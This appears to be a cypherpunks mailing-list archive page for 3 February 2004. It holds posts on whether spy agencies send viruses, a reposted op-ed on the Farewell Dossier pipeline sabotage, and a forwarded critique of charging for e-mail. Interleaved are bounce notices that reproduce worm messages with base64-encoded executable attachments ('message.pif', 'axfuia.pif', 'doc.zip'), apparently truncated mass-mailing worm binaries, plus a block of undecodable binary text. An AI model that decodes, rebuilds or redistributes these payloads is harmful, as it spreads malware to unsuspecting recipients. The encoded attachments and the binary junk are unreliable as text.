allows them to collect the information they need, when instead they can do 
something active and stupid that could possibly give away their position.

Think about it.  In fact, apply Occam's Razor to this, in fine, thin slices:

If you were a TLA and you'd want to send a "fake" virus, it would need to 
be something that would trip every anti-virus software that anyone could 
possibly run, but yet, not be a virus, and you'd need to do so without 
giving away your IP address - while making it look like it came from lots 
of sources.  If you'd only use a single IP address, the guy that runs the 
node would likely block you as a virus source.

Then, on top of it, you'd have to *HOPE* that none of your targets saw the 
real version of the virus, and then bothered to compare the two, or worse 
yet, dissect the decoy you've sent, and figure out that it isn't real.

How's would you do this and have it be successful?  Unless, of course, you 
wish to claim that the TLA's wrote the anti-SCO viruses?  In which case, 
there's a lovely bridge between Brooklyn and Manhattan that I would gladly 
sell you...  Real cheap...  it's a bit old, but it's in decent shape... 
No?  How about some nice foil hats?  Real cheap...  For you, only $100 each 
(plus tax of course)... guaranteed to be made of 100% aluminum foil.

Or would you instead, simply just stick a Carnivore machine at one hop 
above each CDR node that you're interested in, and gather the information 
you wanted with nearly zero risk of tipping your hand?  Or even simpler 
than that, get a hotmail or yahoomail account and just subscribe.  Which of 
the above scenarios makes the most sense in terms of Occam's?

P.S.: I stand by my original statement: the collective IQ of the posters on 
list is dropping.



Undeliverable Mail

2004-02-03 Thread Postmaster
User mailbox exceeds allowed size: [EMAIL PROTECTED]


Original message follows.

Received: from minder.net [219.133.113.224] by cemail-4 with ESMTP
  (SMTPD32-7.07) id A969A6032A; Wed, 04 Feb 2004 00:16:41 +0800
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Hello
Date: Tue, 3 Feb 2004 23:15:33 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="=_NextPart_000_0009_ED67452F.2F61D396"
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: <[EMAIL PROTECTED]>

This is a multi-part message in MIME format.

--=_NextPart_000_0009_ED67452F.2F61D396
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit

The message contains Unicode characters and has been sent as a binary attachment.


--=_NextPart_000_0009_ED67452F.2F61D396
Content-Type: application/octet-stream;
name="message.pif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="message.pif"

TVqQAAME//8AALgAQAAA
qAAA
UEUA
AEwBAwDgAA8BCwEHAABQEGAAAGC+cMAASgAAEAAA
AAIAAAQABAAA0BACAAAQAAAQABAAABAQ
AADowQAAMAEAAADAAADoAQAA

AABVUFgwAABgEAAEAACAAADg
VVBYMQAAUHBQBAAAQAAA4C5yc3JjABDA
BFQAAEAAAMAA






[message truncated]



Delivery Status Notification (Failure)

2004-02-03 Thread postmaster
This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

   [EMAIL PROTECTED]



Reporting-MTA: dns;mail.apawood.org
Received-From-MTA: dns;minder.net
Arrival-Date: Tue, 3 Feb 2004 09:05:48 -0800

Final-Recipient: rfc822;[EMAIL PROTECTED]
Action: failed
Status: 5.1.1
--- Begin Message ---
{‚2?áÙó˜ÓÌD¸¨?ÁüÆJQ/Z?Ç?7îq·'HJ5Íj6’Š¥v²¾îëþ1?žâŠ\:N×Á?7•êV‡ReXœT¶G.2k|3–Ðp¼XØV¨fˆÕs¦!zŸT/ŒbŒãèÐdmÏY©®ªÈž9ç 
†Lk”ï}ûR(u)<̵' *‰
?RµÁ[°Œá×nRø$UØuä•u¨}-•ç”UëªäÕ’^´äFï‰?c‘wb
qå¨À×ÅD¤4†Yïfìèu»3Õg"º¼™[
gBùèó?,àfÈO’·Eeq¹bBì¯õd_M ^Q|¯C5Rtâ½
Ɉ—jÏA,\Þ*îÔÚ‹ÎLü~>åÃ%^•EÒ£?
*[¾{aä_VºSØlk
Ñ¡JvY‡Ÿú¶º¿¹W¸Í&n«™k‚ÓŒZM°˜Ý³Œ[VÕcc}Õ¹ÕO®ì![éu?mù™üD½¾aõ‡Í)v×Ì/ñ¡-a£›AFj³dÏBôZå‚Ç«wèÖ‘Pµt¶ü ¼~x6IROÁ­°œTà÷lAQÉíÜQŒòý
”ìs¡v³ ^ä¿o{Œ69TïD2SÊM†à|J¿©û¹KÒ^£w\·ôwL\,ºä‚µ[mj¼R‹ñ‹·Šb¿N[FÞ¨uä”7Ï©þE’™1m™Ç³ß?£ÆØRç,0Q²ºGm78íÙÎ>jQj}“P­rZÌéÖä"Gâ¦ïÐFk½Ñ*ìÊÁÌ.ð!³Q?l‹Ìì‹Ýf¬D“o1:ËñÓ¸Öu%ôQ£µT±[ðâØ?RZ¼¨é›P
Î?«ðØI>œŠ¼—ÚmsLJBF%ŒÒݤ17•^BbW¸˜

<>
--- End Message ---


The Farewell Dossier

2004-02-03 Thread R. A. Hettinga


The New York Times

February 2, 2004
OP-ED COLUMNIST

The Farewell Dossier
By WILLIAM SAFIRE

ASHINGTON

Intelligence shortcomings, as we see, have a thousand fathers; secret
intelligence triumphs are orphans. Here is the unremarked story of "the
Farewell dossier": how a C.I.A. campaign of computer sabotage resulting in
a huge explosion in Siberia - all engineered by a mild-mannered economist
named Gus Weiss - helped us win the cold war.

Weiss worked down the hall from me in the Nixon administration. In early
1974, he wrote a report on Soviet advances in technology through purchasing
and copying that led the beleaguered president - détente notwithstanding -
to place restrictions on the export of computers and software to the
U.S.S.R.

Seven years later, we learned how the K.G.B. responded. I was writing a
series of hard-line columns denouncing the financial backing being given
Moscow by Germany and Britain for a major natural gas pipeline from Siberia
to Europe. That project would give control of European energy supplies to
the Communists, as well as generate $8 billion a year to support Soviet
computer and satellite research.

President François Mitterrand of France also opposed the gas pipeline. He
took President Reagan aside at a conference in Ottawa on July 19, 1981, to
reveal that France had recruited a key K.G.B. officer in Moscow Center.

 Col. Vladimir Vetrov provided what French intelligence called the Farewell
dossier. It contained documents from the K.G.B. Technology Directorate
showing how the Soviets were systematically stealing - or secretly buying
through third parties - the radar, machine tools and semiconductors to keep
the Russians nearly competitive with U.S. military-industrial strength
through the 70's. In effect, the U.S. was in an arms race with itself.

Reagan passed this on to William J. Casey, his director of central
intelligence, now remembered only for the Iran-contra fiasco. Casey called
in Weiss, then working with Thomas C. Reed on the staff of the National
Security Council. After studying the list of hundreds of Soviet agents and
purchasers (including one cosmonaut) assigned to this penetration in the
U.S. and Japan, Weiss counseled against deportation.

 Instead, according to Reed - a former Air Force secretary whose
fascinating cold war book, "At the Abyss," will be published by Random
House next month - Weiss said: "Why not help the Soviets with their
shopping? Now that we know what they want, we can help them get it." The
catch: computer chips would be designed to pass Soviet quality tests and
then to fail in operation.

 In our complex disinformation scheme, deliberately flawed designs for
stealth technology and space defense sent Russian scientists down paths
that wasted time and money.

 The technology topping the Soviets' wish list was for computer control
systems to automate the operation of the new trans-Siberian gas pipeline.
When we turned down their overt purchase order, the K.G.B. sent a covert
agent into a Canadian company to steal the software; tipped off by
Farewell, we added what geeks call a "Trojan Horse" to the pirated product.

 "The pipeline software that was to run the pumps, turbines and valves was
programmed to go haywire," writes Reed, "to reset pump speeds and valve
settings to produce pressures far beyond those acceptable to the pipeline
joints and welds. The result was the most monumental non-nuclear explosion
and fire ever seen from space."

 Our Norad monitors feared a nuclear detonation, but satellites that would
have picked up its electromagnetic pulse were silent. That mystified many
in the White House, but "Gus Weiss came down the hall to tell his fellow
NSC staffers not to worry. It took him another twenty years to tell me why."

 Farewell stayed secret because the blast in June 1982, estimated at three
kilotons, took place in the Siberian wilderness, with no casualties known.
Nor was the red-faced K.G.B. about to complain publicly about being tricked
by bogus technology. But all the software it had stolen for years was
suddenly suspect, which stopped or delayed the work of thousands of worried
Russian technicians and scientists.

 Vetrov was caught and executed in 1983. A year later, Bill Casey ordered
the K.G.B. collection network rolled up, closing the Farewell dossier. Gus
Weiss died from a fall a few months ago. Now is a time to remember that
sometimes our spooks get it right in a big way. 


-- 
-
R. A. Hettinga 
The Internet Bearer Underwriting Corporation 
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'



Delivery Status Notification (Failure)

2004-02-03 Thread postmaster
This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

   [EMAIL PROTECTED]



Reporting-MTA: dns;thmail.toohome.com
Received-From-MTA: dns;minder.net
Arrival-Date: Tue, 3 Feb 2004 11:36:33 -0500

Final-Recipient: rfc822;[EMAIL PROTECTED]
Action: failed
Status: 5.1.1
--- Begin Message ---
Mail transaction failed. Partial message is available.

<>
--- End Message ---


Failure Notice

2004-02-03 Thread MAILER-DAEMON
Receiver:[EMAIL PROTECTED]
No such user

--- Begin Message ---


<>
--- End Message ---


failure notice

2004-02-03 Thread MAILER-DAEMON
Hi. This is the qmail-send program at 211-255-52-6.rev.krline.net.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

<[EMAIL PROTECTED]>:
Sorry, no mailbox here by that name. vpopmail (#5.1.1)

--- Below this line is a copy of the message.

Return-Path: <[EMAIL PROTECTED]>
Received: (qmail 28419 invoked by alias); 4 Feb 2004 00:01:25 +0900(KST)
Received: from unknown (HELO minder.net) (211.110.159.176)
  by webmail.agabang.com with SMTP; 4 Feb 2004 00:01:25 +0900(KST)
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Error
Date: Wed, 4 Feb 2004 00:06:18 +0900
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="=_NextPart_000_0014_EA6ABE7D.2CDE1BA7"
X-Priority: 3
X-MSMail-Priority: Normal

This is a multi-part message in MIME format.

--=_NextPart_000_0014_EA6ABE7D.2CDE1BA7
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit

The message contains Unicode characters and has been sent as a binary attachment.


--=_NextPart_000_0014_EA6ABE7D.2CDE1BA7
Content-Type: application/octet-stream;
name="axfuia.pif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="axfuia.pif"

TVqQAAME//8AALgAQAAA
qAAA
UEUA
AEwBAwDgAA8BCwEHAABQEGAAAGC+cMAASgAAEAAA
AAIAAAQABAAA0BACAAAQAAAQABAAABAQ
AADowQAAMAEAAADAAADoAQAA

AABVUFgwAABgEAAEAACAAADg
VVBYMQAAUHBQBAAAQAAA4C5yc3JjABDA
BFQAAEAAAMAA







MS4yNABVUFghDAkCCUh+iY/UNhyBKZYAAFNOgAAAJgEAxe6H
ApIAUCZKAEAD/bJpmiwQBPQl6AEAS85pmm7ZH8gqwAO4sKimaZqmoJiQiICapmmaeHBoYFhQzWCf
aUgARAc4MDRN03QDKCQcGBDTLLvXCCMD+Cnw6E3TNE3g2NDIvLQ0TdM0rKSclIzONk3TiHxwaClv
XKbpmsEHVEwDRDiapmmaLCQcFAwEaZrObfwofwP07OSmaZqm3NTMyLyapmmatKykoJiQZ5umaYyA
eHAoe2jebNN1B1wDVEwo//sLdrb740APNCj3LC8DmqYZ+SQoShwUDARpms7sm/wnA+zo4KZpmqbY
1MzIwJqmabq4J7CsqKCYaZqmaZSMiIR8pGmapnRsZFxUaZqmG0wDREA4MKZpmqYoIBgQCJqmc5sA
+CbPA+jg2Gebzm1UNEMDQDQ024r/nVrQ2uX0Bh8zTmxyTtgCl1+SyAE9fL5DS5bkNYngOpf/
91rAKZUEdutj3lzdYehy/48iuFHtjC7TeybUDTnwqmf/J+qweUUU5ruTbkwtEfjiz7+y
qKGdnJ6jq7bE1ekAGjf/V3qgyfUkVovD/jx9wQhSn+9CmPFNrA5z20a0JZkQigf/hwqQ
GaWlqP7yw9Ko+BIsSmuPtuANPXCm3xtafOEnVcn/EmC+GGXVOJ4Xc+JUiUG8muM/xlCNbQCW
T8tqDLFDerL/cxfOiEcFyIpXI/LEmXFMLgvv1sCtnZCGD3t6fJGJlKL/s8fe+hU1WH6n
wwI0eaHcGluP5jBtzSB2zyuK/FG5JJL/A3fuaOVl6G6Xg4N2jJWhsMLX7wooSW2UvusbToS9
+Tj/er8HUqDxRWyWU7MafOVRwDKnH5oYmR2kLrtL3nQNqUj/6o834pBB9axmI+OmbDUB
0KJ3TyoI6c20not7bmRdWVj/Wl9ncoCRpbzW8xM2XIWx4BJHf7r4OX3EDlur/lStCT3/
mnenAnDhVcwGw0PGXNVhYWRqc3+MoLXN6AYnS3Kcyfn/LGKbVxZYfbBgJv4jetQxkeRawy/O
EIX9dPZ3+4AMmSn/vFLrhybIbRXAbh+TikThlNQSId+ugFUtGObHq/J8aVn/TkI7Nzg4
PUVQXm+DmrTR8RQ6Y8++8OVstuQjW/e8Yaj/0DuJ7nM8Y/iZ4MVLkRehId4isz8/VEhRe29+
1s/ZbpX/3/7/KQMj6ZQJv+bzpUEQpnwyaWuAIQstx07SEIJs+f9zp3feFIcHB/tSqgFhwCyb
9yaW3ZedImAPRp7N/SxAf/+TstLxCSBYdmhjXVBSUVNqZHcBLMXvVDC8VxE8zp1Xbv8g
461g2tFSFc5mX7dBwBTkZZOfeP5yDbznapV7exN2dv99HA0t8vb0sPHR53n63Uxlo/8nbIzd
C9uMG6m9dYc7T//bFIJCFAlFzIIP+mK3KXP7FYPnHpN+tCRpKf+9KMvqTv//7f93Djqwv/dU
1OxzmAFNBp3yoq/CYvPlXjffBXFS/wf4G0B+VD6nqU8sAn0wyOcG0lQqGmtMAZ0E9mr6HccG
/4X///gdkASrlgAGBhAr75nUTv8XeAuTxvh1IYyk/1//zHJr62/+pf3s0EHJeJHZxKwmx+jg
qbcaXW/sKRCj/7zz7fVvUSE1jdZTHEgpGOO3XD+duM3QUlXjtUPqvmfj/6CgMuLOSTok
LzAKj66E4XVAoWKYsvUwSuDj/5GBwScH/3eIZ49Us4UI4v6CRathjnTauyo4rvBK1BicF4pI
wrW8/577H1bmbpDgO0ezoBq30qq8xPeTSKYBwAT/BhKLXanY/72UMfgf6FpjPt/WCspC
1QxeYEly9fSu9FMX/BYV8o6a/3NwPIKx4o43W1MWoieUVFissTU3Pqp1ZZUhbusahIFq
/+YKGD86lZ+BguNzpEc9CQLWLojCp9U/ilzqn1Y7Xz1K/9L//8N5X0MJuPCrms4esoXZS8HUO17P
3/ZH+Ur3/9j7LbSKZ2L/WK0RjCL3W8tY34X8rOBl2uuXlOJgCO8//zzj7H8QjmB+3U2b
5J0FG5d628yz+zePJfE5HbJ8GvUd/x+9n+nG6unrPtmWcP072kUl9vOk59YEIUw5/lukh4mS
C53TsFuNKjZCG8rR5DRQrMMcxeFmimxbM1FC/+0+I6ti1+6U9DSy6dVJrF4mrrxteWeV
WzeGpII9rofD/

[no subject]

2004-02-03 Thread selector


<>


Error

2004-02-03 Thread donrf


<>


hi

2004-02-03 Thread andrew


<>


Mail System Error - Returned Mail

2004-02-03 Thread Mail Administrator
This Message was undeliverable due to the following reason:

Each of the following recipients was rejected by a remote mail server.
The reasons given by the server are included to help you determine why
each recipient was rejected.

Recipient: <[EMAIL PROTECTED]>
Reason:[EMAIL PROTECTED] unknown


Please reply to [EMAIL PROTECTED]
if you feel this message to be in error.
Reporting-MTA: dns; mta9.adelphia.net
Arrival-Date: Tue, 3 Feb 2004 09:01:38 -0500
Received-From-MTA: dns; minder.net (68.66.186.171)

Final-Recipient: RFC822; <[EMAIL PROTECTED]>
Action: failed
Status: 5.1.1
Remote-MTA: dns; mx11.pipeline.com (207.69.200.82)
Diagnostic-Code: smtp; 550 [EMAIL PROTECTED] unknown
--- Begin Message ---


<>
--- End Message ---


hi

2004-02-03 Thread brent


<>


Mail delivery failed: returning message to sender

2004-02-03 Thread Mail Delivery System
This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

  [EMAIL PROTECTED]
SMTP error from remote mailer after end of data:
host mail.sourceforge.net [66.35.250.206]: 550-For the time being, we are blocking 
all mail with the .zip extentsion.  If
550 this this is a problem, please open a Support Request on the SF.net webite.

-- This is a copy of the message, including all the headers. --
-- The body of the message is 31018 characters long; only the first
-- 16384 or so are included here.

Return-path: <[EMAIL PROTECTED]>
Received: from [81.193.75.115] (port=34104 helo=minder.net)
by externalmx.vasoftware.com with esmtp (Exim 4.24 #1 (Debian))
id 1AnzSc-0004oS-UR
for <[EMAIL PROTECTED]>; Tue, 03 Feb 2004 04:15:23 -0800
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: hi
Date: Tue, 3 Feb 2004 12:12:01 +
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="=_NextPart_000__C45524AB.00EBA204"
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: <[EMAIL PROTECTED]>

This is a multi-part message in MIME format.

--=_NextPart_000__C45524AB.00EBA204
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit




--=_NextPart_000__C45524AB.00EBA204
Content-Type: application/octet-stream;
name="doc.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="doc.zip"

UEsDBAoAAIBhQzDKJx+eAFgAAABYAAAHZG9jLnBpZk1akAADBP//AAC4
AEAAAKgA

AFBFAABMAQMA4AAP
AQsBBwAAUBBgAABgvgAAAHDAAEoAABACAAAEAAQA
ANAQAgAAEAAAEAAQAAAQEAAA6MEAADAB
wAAA6AEA
VVBY
MAAAYBAABAAAgAAA4FVQWDEAAFBwUAAA
AAQAAEAAAOAucnNyYwAQwAQAAABUAABA
AADA






ADEu
MjQAVVBYIQwJAglIfomP1DYcgSmWAABTTgAAAIAAACYBAMXuhwKSAFAmSgBAA/2yaZosEAT0JegB
AEvOaZpu2R/IKsADuLCopmmapqCYkIiAmqZpmnhwaGBYUM1gn2lIAEQHODA0TdN0AygkHBgQ0yy7
1wgjA/gp8OhN0zRN4NjQyLy0NE3TNKyknJSMzjZN04h8cGgpb1ym6ZrBB1RMA0Q4mqZpmiwkHBQM
BGmazm38KH8D9OzkpmmaptzUzMi8mqZpmrSspKCYkGebpmmMgHhwKHto3mzTdQdcA1RMKP/7C3a2
++NADzQo9ywvA5qmGfkkKEocFAwEaZrO7Jv8JwPs6OCmaZqm2NTMyMCapmm6uCewrKigmGmapmmU
jIiEfKRpmqZ0bGRcVGmaphtMA0RAODCmaZqmKCAYEAiapnObAPgmzwPo4Nhnm85tVDRDA0A0NNuK
/51a0Nrl9AYfM05sck7YApdfksgBPXy+Q0uW5DWJ4DqX//dawCmVBHbrY95c3WHocv+P
IrhR7Ywu03sm1A058Kpn/yfqsHlFFOa7k25MLRH44s+/sqihnZyeo6u2xNXpABo3/1d6
oMn1JFaLw/48fcEIUp/vQpjxTawOc9tGtCWZEIoH/4cKkBmlpaj+8sPSqPgSLEprj7bgDT1w
pt8bWnzhJ1XJ/xJgvhhl1TieF3PiVIlBvJrjP8ZQjW0Alk/LagyxQ3qy/3MXzohHBciK
VyPyxJlxTC4L79bArZ2Qhg97enyRiZSi/7PH3voVNVh+p8MCNHmh3Bpbj+Ywbc0gds8rivxR
uSSS/wN37mjlZehul4ODdoyVobDC1+8KKEltlL7rG06Evfk4/3q/B1Kg8UVsllOzGnzl
UcAypx+aGJkdpC67S950DalI/+qPN+KQQfWsZiPjpmw1AdCid08qCOnNtJ6Le25kXVlY
/1pfZ3KAkaW81vMTNlyFseASR3+6+Dl9xA5bq/5UrQk9/5p3pwJw4VXMBsNDxlzVYWFkanN/
jKC1zegGJ0tynMn5/yxim1cWWH2wYCb+I3rUMZHkWsMvzhCF/XT2d/uADJkp/7xS64cm
yG0VwG4fk4pE4ZTUEiHfroBVLRjmx6vyfGlZ/05COzc4OD1FUF5vg5q00fEUOmPPvvDlbLbk
I1v3vGGo/9A7ie5zPGP4meDFS5EXoSHeIrM/P1RIUXtvftbP2W6V/9/+/ykDI+mUCb/m86VB
EKZ8MmlrgCELLcdO0hCCbPn/c6d33hSHBwf7UqoBYcAsm/cmlt2XnSJgD0aezf0sQH//
k7LS8QkgWHZoY11QUlFTamR3ASzF71QwvFcRPM6dV27/IOOtYNrRUhXOZl+3QcAU5GWTn3j+
cg2852qVe3sTdnb/fRwNLfL29LDx0ed5+t1MZaP/J2yM3QvbjBupvXWHO0//2xSCQhQJ
RcyCD/pitylz+xWD5x6TfrQkaSn/vSjL6k7//+3/dw46sL/3VNTsc5gBTQad8qKvwmLz5V433wVx
Uv8H+BtAflQ+p6lPLAJ9MMjnBtJUKhprTAGdBPZq+h3HBv+F///4HZAEq5YABgYQK++Z1E7/
F3gLk8b4dSGMpP9f/8xya+tv/qX97NBByXiR2cSsJsfo4Km3Gl1v7CkQo/+88+31b1Eh
NY3WUxxIKRjjt1w/nbjN0FJV47VD6r5n4/+goDLizkk6JC8wCo+uhOF1QKFimLL1MErg4/+R
gcEnB/93iGePVLOFCOL+gkWrYY502rsqOK7wStQYnBeKSMK1vP+e+x9W5m6Q4DtHs6Aa
t9KqvMT3k0imAcAE/wYSi12p2P+9lDH4H+haYz7f1grKQtUMXmBJcvX0rvRTF/wWFfKOmv//
//9zcDyCseKO

[no subject]

2004-02-03 Thread fidji . marne
The message cannot be represented in 7-bit ASCII encoding and has been sent as a 
binary attachment.

<>


Re: Cypherpunks response to viral stimuli

2004-02-03 Thread Eugen Leitl
On Mon, Feb 02, 2004 at 05:23:02PM -0800, Bill Stewart wrote:

> Five or ten years ago, when the Feds were still pretending to be in
> control of crypto, crypto enthusiasts were still a threat - these days you
> can pick up VPN boxes at the grocery store, and if they still care about
> us, they're more likely to be interested in content and the identities of
> active posters than in the identity of lurkers.   They can observe a lot

I presume tracking down people who're actually concerned about security and
take some troubles to conceal their identity would be a good bootcamp for 
beginner TLAings. Iterated tiger teams interactions will inbreed, so they
need a source of novelty. But tracking down competent h4x0rs will be no doubt far
more challenging.

> just by looking, or they can announce a sale on tinfoil hats and see who
> responds, or ask a Stupid Newbie Question and see who flames them, or
> forge a message about Guns from a Usual Suspect and see who claims that
> theirs is bigger, or post about something tangential like how to stop spam
> (which has pretty much replaced libertarianism and censorship as the
> all-consuming discussion topic on the net.)

What's the point of busting a wannabee? Just to earn some tinfoil stars, to
make your organizational unit look good? Doesn't compute. No one got
bitchslapped but the AP fellow.

> Viruses and Web Bugs are less likely to be useful for detecting
> Cypherpunks (or Mac users, or Linux users) than for detecting the general
> public - to some  extent we may be smarter about that, or at least
> grumpier about HTML mail, plus some of the cpunks nodes filter out that
> sort of thing.  But perhaps they're exploiting that stack overflow bug in
> PGP 2.6.2 instead.

If you have advanced remote-diagnostic and remote-exploit capabilities, you
never let your hand show on an insignficant target. Even if you camouflage as
a h4x0r, penetrating a well-secured box is bound to raise some eyebrows (you
don't see a packet logger in passive mode).

No doubt such capabilities are reserved for cyberwar and industrial
espionage.

P.S. Sorry about the MIME sig screwup. I forgot.

-- Eugen* Leitl http://leitl.org";>leitl
__
ICBM: 48.07078, 11.61144http://www.leitl.org
8B29F6BE: 099D 78BA 2FD3 B014 B08A  7779 75B0 2443 8B29 F6BE
http://moleculardevices.org http://nanomachines.net



Japanese girl VS playboy

2004-02-03 Thread sales
Content-Type: application/octet-stream;
name=Params.richmedia=yes&Params[6].htm
Content-Transfer-Encoding: base64
Content-ID: 

PGEgdGFyZ2V0PSJfbmV3IiBocmVmPSJodHRwOi8vYWRzLmFzNHgudG1jcy5uZXQvZXZlbnQu
bmcvVHlwZT1jbGljayZGbGlnaHRJRD0zODIwMyZBZElEPTUwOTQyJlRhcmdldElEPTE1Mjcm
U2VnbWVudHM9MTA0MCwxMDc4LDEzMjcsMjA5OSwyMjI3LDUxMDQsNjE0NCw2Mjc4LDY1NTQs
ODExOCw4MjYwLDg4NjYmVGFyZ2V0cz0xMTYwLDE1MjcsNzQzMiZWYWx1ZXM9MzEsNDMsNDgs
NTAsNjAsODAsOTAsMTAxLDExMCwxNTAsMjQ3LDYzOCw3NjIsMTQ5MSwyMTQxLDIyMTAsMjM5
MCwyNDk4LDI1MjIsMjU2MiwyNTY0LDI1NzcsMjYxMiwyNjMzLDI4MjEsMzI5OCw0Mjc0LDQ4
MzgsNDkwNCw0OTcxLDQ5ODksNDk5NSZSYXdWYWx1ZXM9JlJlZGlyZWN0PWh0dHA6Ly8iPjxp
bWcgc3JjPSJodHRwOi8vY3JlYXRpdmVzLmFzNHgudG1jcy5uZXQvZGVmYXVsdEltYWdlLmdp
ZiIgYm9yZGVyPTAgaGVpZ2h0PTEgd2lkdGg9MSBhbHQ9IiI+PC9hPj==

Internet.Com Format Error

2004-02-03 Thread Internet.com
Sorry, your email containing an attachment can not be distributed through
Internet.Com discussion lists.

The only acceptable format for posting to isp-investor is ASCII
Text, with NO attachments.

Please, re-send your post to continue your discussion on
isp-investor.



MAIL TRANSACTION FAILED

2004-02-03 Thread jerry
test

<>


Internet.Com Format Error

2004-02-03 Thread Internet.com
Sorry, your email containing an attachment can not be distributed through
Internet.Com discussion lists.

The only acceptable format for posting to isp-asia is ASCII
Text, with NO attachments.

Please, re-send your post to continue your discussion on
isp-asia.



[no subject]

2004-02-03 Thread vandsija




data.cmd
Description: Binary data


Mail Transaction Failed

2004-02-03 Thread tanglibo
The message cannot be represented in 7-bit ASCII encoding and has been sent as a 
binary attachment.

<>


Delivery Status Notification (Failure)

2004-02-03 Thread postmaster
This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

   [EMAIL PROTECTED]



Reporting-MTA: dns;ewmdcusa.ewmfg.com
Received-From-MTA: dns;minder.net
Arrival-Date: Tue, 3 Feb 2004 03:33:12 -0500

Final-Recipient: rfc822;[EMAIL PROTECTED]
Action: failed
Status: 5.1.1
--- Begin Message ---
The message cannot be represented in 7-bit ASCII encoding and has been sent as a 
binary attachment.

<>
--- End Message ---


[IP] Charging For E-Mail (fwd from dave@farber.net)

2004-02-03 Thread Eugen Leitl
- Forwarded message from Dave Farber <[EMAIL PROTECTED]> -

From: Dave Farber <[EMAIL PROTECTED]>
Date: Mon, 02 Feb 2004 17:34:41 -0500
To: [EMAIL PROTECTED]
Subject: [IP] Charging For E-Mail
X-Mailer: munch
X-Mailer: QUALCOMM Windows Eudora Version 6.0.2.0
Reply-To: [EMAIL PROTECTED]

And there are several more good arguments against it as proposed.

Dave


Delivered-To: [EMAIL PROTECTED]
Date: Mon, 02 Feb 2004 12:52:49 -0800 (PST)
From: Lauren Weinstein <[EMAIL PROTECTED]>
Subject: Charging For E-Mail
To: [EMAIL PROTECTED]
Dave,

Just a few notes on the issues of "charging" for e-mail...

 - As you point out, any fee structure is likely to start off
   low and rise as attempts are made to maximize the profit center
   on the part of ISPs.

 - Once ISP e-mail charging schemes are in place, governments will likely
   express interest in potential revenue to be derived from such sources.
   The long-debunked rumor of the "e-mail tax" might well become a reality.
   It has already been suggested in some quarters that the U.S. Postal
   Service's new "Electronic Postmark" EPM/Authentidate system could
   ultimately be a model in this regard.

 - It appears likely that a primary initial use for e-mail charging schemes
   would be to allow certain classes of bulk mailers to bypass ISP anti-spam
   filters to directly reach the captive audience of those ISPs.  If you've
   got the bucks, you're classified as a "good" spammer and your wonderful
   offers will reach all those "grateful" e-mail recipients without
   interference from those pesky filter rules.

 - E-mail charging schemes can be used as an excuse to further bind
   customers tightly to their current ISPs.  The "SPF" e-mail domain control
   system already has this effect by discouraging the legitimate use of
   alternate domains by users in many cases.

 - Widely-deployed e-mail charging would likely require ISPs to attempt
   extremely tight, centralized control over e-mail routing to try prevent
   "unauthorized" (and uncharged) e-mail flows by users operating their own
   MTAs (Mail Transfer Agents), non-escrowed e-mail encryption systems,
   and/or other "unapproved" technologies.  Such centralized and enforced ISP
   control over e-mail would obviously have drastic potential negative
   privacy and security impacts.

 - The concept of widespread, enforced e-mail charging neglects to
   acknowledge the reality that e-mail is fundamentally an end-to-end
   Internet application that can be indistinguishable at the data level from
   most other applications.  The backlash to e-mail charging schemes would
   likely give rise to vast distributed "underground" e-mail transport
   systems, encrypted and even designed to masquerade as other types of
   data.  Even draconian attempts by ISPs to limit their subscribers' access
   to alternate TCP/IP ports would be unlikely to stem the flood of such
   alternate e-mail transport environments, that could even emulate
   standard Web (HTTP) traffic.  Illicit music file trading would likely
   look like a drop in the bucket by comparison.

Bottom line: Trying to charge broadly for e-mail could well provide
a textbook definition of "Pandora's Box" brought to life.

--Lauren--
Lauren Weinstein
[EMAIL PROTECTED] or [EMAIL PROTECTED] or [EMAIL PROTECTED]
Tel: +1 (818) 225-2800
http://www.pfir.org/lauren
Co-Founder, PFIR - People For Internet Responsibility - http://www.pfir.org
Co-Founder, Fact Squad - http://www.factsquad.org
Co-Founder, URIICA - Union for Representative International Internet
 Cooperation and Analysis - http://www.uriica.org
Moderator, PRIVACY Forum - http://www.vortex.com
Member, ACM Committee on Computers and Public Policy


   

-
You are subscribed as [EMAIL PROTECTED]
To manage your subscription, go to
 http://v2.listbox.com/member/?listname=ip

Archives at: http://www.interesting-people.org/archives/interesting-people/

- End forwarded message -
-- Eugen* Leitl http://leitl.org";>leitl
__
ICBM: 48.07078, 11.61144http://www.leitl.org
8B29F6BE: 099D 78BA 2FD3 B014 B08A  7779 75B0 2443 8B29 F6BE
http://moleculardevices.org http://nanomachines.net


pgp0.pgp
Description: PGP signature


Re: Cypherpunks response to viral stimuli

2004-02-03 Thread Morlock Elloi
Can a TLA please give some sign here, any sign - just ack that you know the
list exists, otherwise the legitimacy of cpunks is definitely going down the
drain.

Looks like a Berlin wall syndrome.



=
end
(of original message)

Y-a*h*o-o (yes, they scan for this) spam follows:

__
Do you Yahoo!?
Yahoo! SiteBuilder - Free web site building tool. Try it!
http://webhosting.yahoo.com/ps/sb/



A virus was detected in a message you sent

2004-02-03 Thread Symantec_AntiVirus_for_SMTP_Gateways